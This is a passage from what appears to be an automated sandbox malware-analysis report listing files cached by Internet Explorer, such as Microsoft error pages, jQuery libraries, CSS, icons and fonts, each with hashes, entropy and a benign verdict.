C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\dnserrordiagoff[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 1678

Entropy (8bit): 4.566317707595381

Encrypted: false

MD5: 7E81A79F38695E467A49EE41DD24146D

SHA1: 035E110C36BF3072525B05394F73D1BA54D0D316

SHA-256: A705D1E0916A79B0D6E60C41A9CE301ED95B3FC00E927F940AB27061C208A536

SHA-512: 53C5F2F2B9AD8B555F9AE6644941CF2016108E803EA6AB2C7418E31E66874DEA5A2BC04BE0FA9766E7206617879520E730E9E3E0DE136BAE886C2E786082D622

Malicious: false

Reputation: moderate, very likely benign file

Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\dnserrordiagoff[2]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 1678

Entropy (8bit): 4.566317707595381

Encrypted: false

MD5: 7E81A79F38695E467A49EE41DD24146D

SHA1: 035E110C36BF3072525B05394F73D1BA54D0D316

SHA-256: A705D1E0916A79B0D6E60C41A9CE301ED95B3FC00E927F940AB27061C208A536

SHA-512: 53C5F2F2B9AD8B555F9AE6644941CF2016108E803EA6AB2C7418E31E66874DEA5A2BC04BE0FA9766E7206617879520E730E9E3E0DE136BAE886C2E786082D622

Malicious: false

Reputation: moderate, very likely benign file

Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\ellipsis_white[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 22356

Entropy (8bit): 6.694074336333653

Encrypted: false

MD5: 5CFA4099FDF578C66B0BDD5ED7863EA2

SHA1: F7655793E88D1A769F5CCF472870AB5CD503C597

SHA-256: 17A4AE07EF1009A19AA43AAAB3CBD803CB1E043D92E6700833F0E9DA7DB65403

SHA-512: 6AA8068CC945481D4392D531AD7E5E45F9B8A00ED9064C3D376A4984F33445DE48D283F1A699C870FE97A484EA02C2A65DB9214202C9E7F4816BBA7D4A6131D0

Malicious: false

Reputation: low

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#ffffff" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>623,1.381,5.212,5.212,0,0,1,1.3,3.729,5.257,5.257,0,0,1-1.386,3.83,5.019,5.019,0,0,1-

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquery-3.3.1.min[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 86927

Entropy (8bit): 5.289226719276158

Encrypted: false

Copyright Joe Security LLC 2019 Page 22 of 47

MD5: A09E13EE94D51C524B7E2A728C7D4039

SHA1: 0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE

SHA-256: 160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF

SHA-512: F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A

Malicious: false

Reputation: moderate, very likely benign file

Preview: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquery-3.3.1.min[1].js

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines

Size (bytes): 96649

Entropy (8bit): 5.297804550899051

Encrypted: false

MD5: E55ECB02E7376CD010C764107EBD513F

SHA1: FA6D184DF01EC535628DC8FAF38211591BAADFC8

SHA-256: 5776881753B95A0ABE5D1F6EFE3ABE7B83A3265EACCD117DD948E523C044600C

SHA-512: 099C665E1CEE8DF9C5D5C340A14170341BD29E0321875FF08E594B750CFDBF2CA8C9B45B584FCA21F87CBE6CD8A170918CECFF8C9796AAFA3D89F0AA97509ABD

Malicious: false

Reputation: moderate, very likely benign file

Preview: /*!. * jQuery JavaScript Library v1.10.2. * http://jquery.com/. *. * Includes Sizzle.js. * http://sizzlejs.com/. *. * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors. * Released under the MIT license. * http://jquery.org/license. *. * Date: 2013-07-03T13:48Z. */.!function(e,t){function n(e){var t=e.length,n=ct.type(e);return ct.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}function r(e){var t=kt[e]={};return ct.each(e.match(pt)||[],function(e,n){t[n]=!0}),t}function i(e,n,r,i){if(ct.acceptData(e)){var o,a,s=ct.expando,u=e.nodeType,l=u?ct.cache:e,c=u?e[s]:e[s]&&s;if(c&&l[c]&&(i||l[c].data)||r!==t||"string"!=typeof n){return c||(c=u?e[s]=tt.pop()||ct.guid++:s),l[c]||(l[c]=u?{}:{"toJSON":ct.noop}),("object"==typeof n||"function"==typeof n)&&(i?l[c]=ct.extend(l[c],n):l[c].data=ct.extend(l[c].data,n)),a=l[c],i||(a.data||(a.data={}),a=a.data),r!==t&&(a[ct.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators

Size (bytes): 284727

Entropy (8bit): 5.445836715201731

Encrypted: false

MD5: DCD7AA5F0622498CCC7149AE551D05C4

SHA1: 793500F4E007A374806281DEEE883BBB025964B6

SHA-256: 00F339738C54CF7FB233C1EC171306FD95F90030B51AB92A2F91030EF7BDF24B

SHA-512: 6B9431E03962B2DEEC78B63BB8A8842A181752F2828F38F5B3807AD40A3BE224E65C9EBF80B1F3C953509C325B861C4F4377B4B9289A4570A30EA4B61AF157C6

Malicious: false

Reputation: low

Preview: /*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------....This file is based on or incorporates material from the projects listedbelow (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. .... * Knockout JavaScript library v3.3.0.. * (c) Steven Sanderson - http://knockoutjs.com/.. * License: MIT (http://www.opensource.org/licenses/mit-license.php)....Provided for Informational Purposes Only....MIT License ....Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the Software)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\microsoft_logo[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 1269

Entropy (8bit): 4.111137762573903

Encrypted: false

MD5: 96CB8CEA30D947C962FA2CF959F23890

SHA1: FE2C6762A50C9E4B695AD2DA64663E73F98FE890

SHA-256: 5306E406F5B7B320D6CC69ECF511A3B606058844BC163249781986CBD03E3721

SHA-512: 1191A962C945FBFA4CE9A99B51BB1651BE54DDF221896B37B7001323C35E9672035291332AED39918009B93B57F7D1BEDE4C3205DE14B01C4538E7F20C57C1A3

Malicious: false

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Copyright Joe Security LLC 2019 Page 23 of 47

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\script[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines, with no line terminators

Size (bytes): 171715

Entropy (8bit): 5.325926407045175

Encrypted: false

MD5: C3990846C6D6520733D90A210187FEE5

SHA1: 98E8BBE9C67C53BBE501557FDA3E7D44100F2794

SHA-256: ADEED61C97600E999A2773C89A4D906711C6EC77BD5C8493A2F3C10FB357983D

SHA-512: 6F9BF6D86428A781D09B063F89679C5E9ED5AA4E17E249F2F44D1793B6382B1659EADC1CB57321FFF4F49C6FAC38BC03FAF11479115D64F390EED0A7589CC084

Malicious: false

Preview: function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function ShowHighLight(n){var t=$("#div"+n).height();$.browser.msie&&parseInt($.browser.version,10)==7?$("#div"+n+" > .highlight").css({width:"0",height:"0","background-color":"white",float:"left","border-top":Math.round(t/2+.3)+"px solid white","border-right":"0.75em solid "+$("#div"+n).css("background-color"),"border-bottom":Math.round(t/2+.3)+"px solid white"}):$("#div"+n+" > .highlight").css({width:"0",height:"0","background-color":"white",float:"left","border-top":t/2+.3+"px solid white","border-right":"0.75em solid "+$("#div"+n).css("background-color"),"border-bottom":t/2+.3+"px solid white"})}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\signup[1].htmProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators

Size (bytes): 110160

Entropy (8bit): 5.15728771558402

Encrypted: false

MD5: E83E402C620D96BDC6DC1A8F13A1F798

SHA1: 899E07DA59CD71FBB33C1B6203494F574320F115

SHA-256: 0AFA5CA70FE738B17AEC5D279BE7F491AA248EDEA77D88A5431E3348FD735D98

SHA-512: 17D7D7A9158F94F45D16DC7D24F4CA2DECB894FB752E539FBAF98EDA2872005D85249E25DE06802C3BEAF4E348D3F9F4BF03FDBF4A89FF4AF6B6793CBB8ECEB2

Malicious: false

Preview: .. Copyright (C) Microsoft Corporation. All rights reserved. -->....<!DOCTYPE html>..<html lang="en" xml:lang="en" class="m_ul" dir="ltr" style="">.. <head>.. <link rel="preconnect" href="https://uhf.microsoft.com" >..<link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<meta http-equiv="x-dns-prefetch-control" content="on">..<link rel="dns-prefetch" href="//uhf.microsoft.com">..<link rel="dns-prefetch" href="//wut.smartscreen.microsoft.com">..<link rel="dns-prefetch" href="//acctcdn.msauth.net">..<link rel="dns-prefetch" href="//acctcdnmsftuswe2.azureedge.net">..<link rel="dns-prefetch" href="//acctcdnvzeuno.azureedge.net">.... <title>Microsoft account</title>.. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"/><meta name="format-detection"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\51-6d3a1e[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines

Size (bytes): 149391

Entropy (8bit): 5.055058698445385

Encrypted: false

MD5: F375A2C25F0E94DB19E607E07F2C4B47

SHA1: 38949C3F25DDD1E56DE5501FF84F4A6D07F2A6BF

SHA-256: 28C68FD8C3D21374261E3A1CD672AA551F01C0B04C2F49C1B53DF95F6D1CDD7B

SHA-512: DF7A83E40093BAD3E594CFA991FFBC7DDB36AAD64FA4F46F4C36EBD4ACDF2BB965432D73A67138B0EEDC18B6FD396369EF0B4DD66CAFBA181CD149725A4A8DF3

Malicious: false

Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\converged.v2.login.min_bxeixgi3llnj-nuc4-xqwa2[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 100774

Entropy (8bit): 5.305482238693464

Encrypted: false

MD5: 6F11225E02372CB349FA7B9CE3E5EAC0

SHA1: A6773684CB3501A34BDC560A3173262E879FF3A8

SHA-256: 21CC48423EE47207382CC9C1C3885913079BE17805E6FF81E76E0E7165CA32CD

SHA-512: 1AD8016439C16B967BAB4BB3A580B0A0A6696253C29B49A45C096BDD93F6E860F97084D188181A68C5D5B09482042966681AD8CD0E6E81564FD594B507570C7D

Malicious: false

Copyright Joe Security LLC 2019 Page 24 of 47

Preview: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file isbased on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 TwiInc..Permission is hereby granted, free of charge, to any person

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\converged.v2.login.min_bxeixgi3llnj-nuc4-xqwa2[1].css

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\convergedbg_small_v2_Z9GCPpM7FVE8hxRSZUez6g2[1].jpgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: JPEG image data, baseline, precision 8, 50x28, frames 3

Size (bytes): 286254

Entropy (8bit): 7.961526577350427

Encrypted: false

MD5: ABA046173F6291AF45F08FD4FBC6386D

SHA1: 453FF1D21D7998626B0E9A107ED9623BAAC998D9

SHA-256: D775B46CE0CEA4773C163A56DC52DAA5DDBCE0BAC7D24B57B8DAC50A66419989

SHA-512: 1F2757149A691BD5338541599FC2980934433B588598FCF8254C9E9D6B15BD59902CF4A2190CF46906404E5ACF54C500A89DA9AF12D4C841827446DBADD31351

Malicious: false

Preview: .....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\dropdown_caret_KXSZjGsyILZaoTf0sI9X-A2[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 224

Entropy (8bit): 5.066130335315081

Encrypted: false

MD5: 2974998C6B3220B65AA137F4B08F57F8

SHA1: F4F08DA689179DE68EE40CD12ECDCC5AC54B3979

SHA-256: 96D52BD03E244A44931A541A807067792D638DD29EC14A87A78F2BE85D12D19A

SHA-512: 6B4F2439CA99109A7C97828E5972A8E7C7FCA3745B2FB4738EBD9329A99234A8CD3BC4C0C48B5BAA917D4BAA64CDAEB5D74456DEFDDDA3E07FAA803283BE0287

Malicious: false

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="36" height="36" viewBox="0 0 36 36"><title>assets</title><path d="M18,22.484l-8-8,.969-.968L18,20.547l7.031-7.031.969.968-8,8Z"/><rect width="36" height="36" fill="none"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\errorPageStrings[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 4720

Entropy (8bit): 5.164796203267696

Encrypted: false

MD5: D65EC06F21C379C87040B83CC1ABAC6B

SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B

SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F

SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E

Malicious: false

Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\jquery-1.11.2.min[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 95931

Entropy (8bit): 5.394232486761965

Encrypted: false

MD5: 5790EAD7AD3BA27397AEDFA3D263B867

SHA1: 8130544C215FE5D1EC081D83461BF4A711E74882

SHA-256: 2ECD295D295BEC062CEDEBE177E54B9D6B19FC0A841DC5C178C654C9CCFF09C0

SHA-512: 781ACEDC99DE4CE8D53D9B43A158C645EAB1B23DFDFD6B57B3C442B11ACC4A344E0D5B0067D4B78BB173ABBDED75FB91C410F2B5A58F71D438AA6266D048D98A

Malicious: false

Copyright Joe Security LLC 2019 Page 25 of 47

Preview: /*! jQuery v1.11.2 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.2",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\jquery-1.11.2.min[1].js

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\latest[1].eotProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: Embedded OpenType (EOT), Segoe UI Semibold family

Size (bytes): 30643

Entropy (8bit): 7.976822258863597

Encrypted: false

MD5: E812BA8B7E2A657F2B70CFACE93C7682

SHA1: 2F02CDDBB483F9B11BBBE74C3CA917A4C345FBAD

SHA-256: 3330C1DEAC468874238DD0C6BF902179A8731EDA8A208C7D01DAC0AB1EAE1BC9

SHA-512: 354B2DB12BC1D67F26F94352B0B663DAD64C46C107454FC19CFEA01C54BB09340BC26C06DE1B96FF826F5287CE246A6317722BAE41B72B63BA86FDAF844BA94E

Malicious: false

Preview: .w...v......................X.....LP#...B.............. ..........................".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2...".S.e.g.o.e. .U.I. .S.e.m.i.b.o.l.d........H.P..lb.7^......U.D.-..iu...:4P\..GLFM.Y.#?.;..-...~}_).z{.rmD.1".$.....{.t.....=...!cK...%.~.....g........j.9S....6. ..n..V.]pz...e.....#X...=,.p.F..6&.VR...k$~J..n....7.......K.8..T.....x..J......#.J.XaQ.Q%_{3..xr.... 0Dm...k..Ep..........>..?Pk!KB..C...Q.q..1=6<,.S.F.&B..J.....ya2b."S.......6.2.......H......*..09A...Tb/.&.d..#.E.:.E.(..I5.M..444d.1........K..l...l.O..VBb...:..:b..Mh.'=4.d/..o.k.mMm........bx..!..S.@E.....>@:..k.JCas..7."..uG3hR.h..w..8W>.4.........pX....J..a....}.Y......(>H^=.`=.mg*.!.....w'...J.<.ob..3A .../.....5%.'....XS0a......I.Ia....a...=..g..........{V1+.."_)7$2 O..!bb.=..|.s.1..2qm..#.O......+E(I..1....EgQ.....E)R.m.?.8.q...J.G.@!f..n.F.r#..(..2p.?.9.8..?.d]..s..0.9.f..A...r.iq....x.g.aO....S.....R0i..BT.yl.".<k...:&Ja.\.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\latest[2].eot

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: Embedded OpenType (EOT), Segoe UI Light family

Size (bytes): 69595

Entropy (8bit): 7.992327121754015

Encrypted: true

MD5: 72010CDB678FBB4CAB5FE12406D7F5EF

SHA1: E7F06A3C0A88250845E14310A24CE209A7695BBC

SHA-256: 22BA31E135F725FF091E11C15EC3103465E3CB5FDCC736413CBBE2F441054638

SHA-512: 84B5E6BC5763A81592F3BE4AB08864540CCD9699DBD3090A4382AB458D191901D9889D8753CDC2952C3F2DCEF954F11E152C330D0915DFC3571221653107BA3D

Malicious: false

Preview: .n...m............................LP#...B.............. ............................S.e.g.o.e. .U.I. .L.i.g.h.t.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .5...3.2.....S.e.g.o.e. .U.I. .L.i.g.h.t..........K..e..66......U.D.-..iu...4P\..GLFM..C?.;..-...~|...P..\.(..)RI.....>.>..CE..SsV.jPR...H.......].R..&.n.hT.......x.....q .......wA[....F.........c.".......Zed..>.?...`..3...B..W....R....F.j....v..'?.5.k^........+..a...).._].x.#QSi.....|<t....k.;..Hv1.G...L$.9....5.t.:...V.Y.......|.@....B.....P`..2.Z.0....2`.FR.MF8.x....GP0..$:.....PYm.22..."S."1.*j[=.=.mR.*.......j....&.4...k..].1@..y$......"y..C..g7..k.B*...V..F\...G.m.jK ...O....b.Qlo...!.N.V....t.[..p.N..~@1d...YX.."....R_i.4.$j.P..U....u9...<..6..4%........9`.....S...N.Y..L..B$2\.E.vhe...n..h..5..Z..K?.H..S...2..=R..x.....EX.2......$."....It8..z.+.h ..$.2*T....}Z../....p..b0ae.qq.(-v1..E.!.l".a..p.).;..8t..7..^..W...4A.D\eOb$......b.NI.Pe.#$.O38....,....g..&|...B{...].....9..u.8..~Y...3.X..ff.,.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\mwfmdl2-v3.07[1].woffProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: Web Open Font Format, TrueType, length 22376, version 0.0

Size (bytes): 22376

Entropy (8bit): 7.978063740714443

Encrypted: false

MD5: DAE68C4A8AAC30A0C75731AA3C7553F3

SHA1: 4E662B5F83B7F10E297A825072AAF87EE01E9FCC

SHA-256: 7F31CBB16DD8190854789BD1B43F15AE60940FB79AFBB7CFBEF664E12F8A247C

SHA-512: 20433B4530D557D360F9ED51B1DD1DE0C6EEC97B33E880D45898FBAF308A51A73104D04293CDA1959ABCA5C787BB0B2AE50DBA2576CC12D2816ADC74CD9B27E8

Malicious: false

